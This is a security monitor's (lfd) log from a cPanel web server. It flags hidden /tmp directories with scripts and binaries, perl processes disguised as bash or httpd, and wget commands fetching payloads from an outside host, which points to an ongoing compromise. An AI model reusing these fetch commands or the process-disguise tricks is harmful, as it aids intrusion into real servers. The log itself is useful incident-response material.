Mar 29 15:10:44 server lfd[7006]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:399169 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 15:10:57 server lfd[14928]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 15:11:00 server lfd[14928]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 15:15:57 server lfd[21318]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 15:15:58 server lfd[21318]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 15:20:58 server lfd[29495]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 15:21:01 server lfd[29495]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 15:21:06 server lfd[29495]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 15:23:04 server lfd[13434]: *Suspicious Process* PID:3020 PPID:2971 User:nobody Uptime:77 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/ybd.txt
Mar 29 15:25:58 server lfd[5685]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 15:26:01 server lfd[5685]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 15:26:02 server lfd[5685]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 16:08:14 server lfd[6133]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1071053 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 16:11:03 server lfd[29045]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 16:11:04 server lfd[29045]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 16:13:14 server lfd[5821]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:402895 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 16:16:03 server lfd[779]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 16:16:05 server lfd[779]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 16:21:05 server lfd[6774]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 16:26:06 server lfd[11881]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 16:26:08 server lfd[11881]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 16:26:09 server lfd[11881]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 16:26:11 server lfd[11881]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 16:26:13 server lfd[11881]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 16:47:10 server lfd[32526]: *Suspicious Process* PID:11875 PPID:8957 User:cavvesc Uptime:1265 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 17:11:13 server lfd[8006]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 17:11:14 server lfd[8006]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 17:11:21 server lfd[8008]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1074847 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 17:16:12 server lfd[10017]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 17:16:13 server lfd[10017]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 17:16:54 server lfd[10018]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:406742 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 17:21:13 server lfd[11703]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 17:26:14 server lfd[12805]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 17:26:16 server lfd[12805]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 17:26:17 server lfd[12805]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 17:31:14 server lfd[13901]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 17:31:16 server lfd[13901]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 18:11:18 server lfd[19360]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 18:11:21 server lfd[19360]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 18:14:32 server lfd[6129]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1078632 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 18:16:17 server lfd[18593]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 18:20:20 server lfd[5298]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:410527 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 18:21:19 server lfd[20341]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 18:21:26 server lfd[20341]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 18:26:18 server lfd[20651]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 18:26:21 server lfd[20651]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 18:31:19 server lfd[18255]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 18:31:21 server lfd[18255]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 18:31:23 server lfd[18255]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 19:11:21 server lfd[6675]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 19:16:22 server lfd[4031]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 19:16:23 server lfd[4031]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 19:17:28 server lfd[10661]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1082413 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 19:23:46 server lfd[7364]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:414313 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 19:26:26 server lfd[29839]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 19:26:27 server lfd[29839]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 19:26:29 server lfd[29839]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 19:31:28 server lfd[29382]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 19:31:31 server lfd[29382]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 19:31:34 server lfd[29382]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 19:31:39 server lfd[29382]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 20:00:43 server lfd[7920]: *Suspicious Process* PID:1135 PPID:1000 User:nobody Uptime:67 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xcl.txt
Mar 29 20:01:36 server lfd[7920]: *Suspicious Process* PID:8715 PPID:8957 User:bppromo Uptime:1633 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 20:11:36 server lfd[7364]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 20:16:36 server lfd[2242]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 20:16:38 server lfd[2242]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 20:17:48 server lfd[9313]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1086028 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 20:26:37 server lfd[25272]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 20:26:40 server lfd[25272]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 20:26:41 server lfd[25272]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 20:30:54 server lfd[11395]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:418351 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 20:31:38 server lfd[21147]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 20:31:44 server lfd[21147]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 20:36:39 server lfd[16865]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 20:36:42 server lfd[16865]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 21:11:40 server lfd[12780]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 21:16:42 server lfd[7653]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 21:16:49 server lfd[7653]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 21:19:56 server lfd[23887]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1089761 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 21:26:42 server lfd[27576]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 21:26:45 server lfd[27576]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 21:31:43 server lfd[22222]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 21:36:43 server lfd[16209]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 21:36:51 server lfd[16209]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 21:36:54 server lfd[16209]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 21:36:57 server lfd[11939]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:422324 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 21:41:44 server lfd[9425]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 22:11:48 server lfd[771]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 22:21:49 server lfd[29344]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 29 22:22:29 server lfd[29344]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 22:22:32 server lfd[29344]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 29 22:22:33 server lfd[29344]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 22:22:35 server lfd[29344]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 22:25:17 server lfd[19979]: *Suspicious Process* PID:12884 PPID:11814 User:nobody Uptime:254 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 29 22:27:12 server lfd[18902]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1093787 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 22:39:30 server lfd[24029]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:426113 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 23:27:01 server lfd[23252]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 29 23:27:07 server lfd[23252]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 23:27:11 server lfd[23252]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 29 23:27:14 server lfd[23252]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 23:27:16 server lfd[23252]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 23:27:43 server lfd[13808]: *Suspicious Process* PID:12884 PPID:11814 User:nobody Uptime:3987 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 29 23:30:18 server lfd[23148]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1097581 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 23:43:51 server lfd[26897]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:429957 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 00:01:34 server lfd[11003]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1099451 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 00:03:35 server lfd[11003]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:431051 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 00:03:50 server lfd[11003]: *Suspicious Process* PID:12884 PPID:11814 User:nobody Uptime:6101 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 00:06:14 server lfd[29383]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 00:06:20 server lfd[29383]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 00:06:23 server lfd[29383]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 00:06:25 server lfd[29383]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 00:06:27 server lfd[29383]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 01:04:36 server lfd[20848]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1103242 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 01:05:26 server lfd[20848]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:434842 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 01:05:37 server lfd[20848]: *Suspicious Process* PID:12884 PPID:11814 User:nobody Uptime:9892 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 01:06:25 server lfd[8283]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 01:11:25 server lfd[20933]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 01:11:29 server lfd[20933]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 01:11:33 server lfd[20933]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 01:11:42 server lfd[20933]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 02:06:00 server lfd[14316]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1106916 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 02:06:32 server lfd[23998]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 02:07:02 server lfd[14316]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:438517 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 02:07:37 server lfd[14316]: *Suspicious Process* PID:12884 PPID:11814 User:nobody Uptime:13567 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 02:11:35 server lfd[1918]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 02:11:38 server lfd[1918]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 02:16:35 server lfd[20493]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 02:16:40 server lfd[20493]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 03:06:43 server lfd[28759]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 03:09:20 server lfd[23374]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1110719 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 03:09:48 server lfd[23374]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:442320 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 03:09:56 server lfd[23374]: *Suspicious Process* PID:12884 PPID:11814 User:nobody Uptime:17370 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 03:11:42 server lfd[17908]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 03:16:45 server lfd[32252]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 03:16:46 server lfd[32252]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 03:16:48 server lfd[32252]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 03:51:27 server lfd[20793]: *Suspicious Process* PID:758 PPID:8957 User:bppromo Uptime:1460 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 04:07:00 server lfd[13465]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 04:10:31 server lfd[15781]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1114391 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 04:11:37 server lfd[15781]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:445991 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 04:11:52 server lfd[15781]: *Suspicious Process* PID:12884 PPID:11814 User:nobody Uptime:21041 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 04:12:01 server lfd[31260]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 04:17:02 server lfd[1716]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 04:17:05 server lfd[1716]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 04:17:08 server lfd[1716]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 05:07:09 server lfd[10579]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 05:11:50 server lfd[20420]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1118059 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 05:12:09 server lfd[24132]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 05:16:10 server lfd[12535]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:449842 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 05:16:37 server lfd[12535]: *Suspicious Process* PID:12884 PPID:11814 User:nobody Uptime:24892 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 05:17:09 server lfd[8241]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 05:17:10 server lfd[8241]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 05:22:09 server lfd[24427]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 06:07:15 server lfd[10804]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 06:12:15 server lfd[30237]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 06:14:42 server lfd[24864]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1121845 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 06:17:16 server lfd[22551]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 06:17:16 server lfd[22551]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 06:18:08 server lfd[15187]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:453566 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 06:22:17 server lfd[11385]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 06:23:50 server lfd[1430]: *Suspicious Process* PID:12884 PPID:11814 User:nobody Uptime:28919 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 06:59:39 server lfd[23251]: *Suspicious Process* PID:11475 PPID:9607 User:nobody Uptime:272 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 07:12:24 server lfd[32248]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 07:12:36 server lfd[32248]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 07:14:55 server lfd[20826]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1125457 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 07:17:24 server lfd[17717]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 07:17:26 server lfd[17717]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 07:22:22 server lfd[15724]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:457418 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 07:27:25 server lfd[17695]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 08:03:31 server lfd[24080]: *Suspicious Process* PID:11475 PPID:9607 User:nobody Uptime:4121 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 08:17:07 server lfd[20527]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1129187 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 08:17:37 server lfd[25489]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 08:17:44 server lfd[25489]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 08:17:51 server lfd[25489]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 08:17:53 server lfd[25489]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 08:23:59 server lfd[19393]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:461156 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 08:27:39 server lfd[1171]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 09:05:04 server lfd[17040]: *Suspicious Process* PID:11475 PPID:9607 User:nobody Uptime:7793 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 09:17:46 server lfd[6000]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 09:19:15 server lfd[18669]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1132916 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 09:22:46 server lfd[19698]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 09:22:49 server lfd[19698]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 09:22:52 server lfd[19698]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 09:26:52 server lfd[24269]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:464946 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 09:27:46 server lfd[11418]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 10:11:54 server lfd[15227]: *Suspicious Process* PID:11475 PPID:9607 User:nobody Uptime:11767 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 10:17:55 server lfd[28922]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 10:20:29 server lfd[21784]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1136593 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 10:23:01 server lfd[20125]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 10:23:04 server lfd[20125]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 10:23:06 server lfd[20125]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 10:27:54 server lfd[25007]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:468611 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 10:28:02 server lfd[31969]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 10:53:27 server lfd[6628]: *Suspicious Process* PID:27122 PPID:8957 User:cavvesc Uptime:601 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 10:54:27 server lfd[16175]: *Suspicious Process* PID:8762 PPID:8957 User:bppromo Uptime:228 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 10:58:28 server lfd[4458]: *Suspicious Process* PID:1887 PPID:8957 User:bppromo Uptime:1056 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 10:59:28 server lfd[9971]: *Suspicious Process* PID:3403 PPID:3149 User:cavvesc Uptime:71 secs EXE:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil CMD:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil -N 10 -D /home/cavvesc/tmp/webalizer/dns_cache.db -R 250 -p -n cavves.com.br -o /home/cavvesc/tmp/webalizer /usr/local/apache/domlogs/cavves.com.br.bkup
Mar 30 11:02:30 server lfd[25782]: *Suspicious Process* PID:16539 PPID:8957 User:bppromo Uptime:107 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 11:04:30 server lfd[3778]: *Suspicious Process* PID:23056 PPID:8957 User:cavvesc Uptime:1277 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 11:07:30 server lfd[19217]: *Suspicious Process* PID:8919 PPID:7653 User:bppromo Uptime:119 secs EXE:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil CMD:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil -N 10 -D /home/bppromo/tmp/webalizer/dns_cache.db -R 250 -p -n boaspromocoes.com.br -o /home/bppromo/tmp/webalizer /usr/local/apache/domlogs/boaspromocoes.com.br.bkup
Mar 30 11:09:31 server lfd[29581]: *Suspicious Process* PID:21803 PPID:21800 User:bppromo Uptime:88 secs EXE:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil CMD:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil -N 10 -D /home/bppromo/tmp/webalizer/img.boaspromocoes.com.br/dns_cache.db -R 250 -p -n img.boaspromocoes.com.br -o /home/bppromo/tmp/webalizer/img.boaspromocoes.com.br /usr/local/apache/domlogs/img.boaspromocoes.com.br.bkup
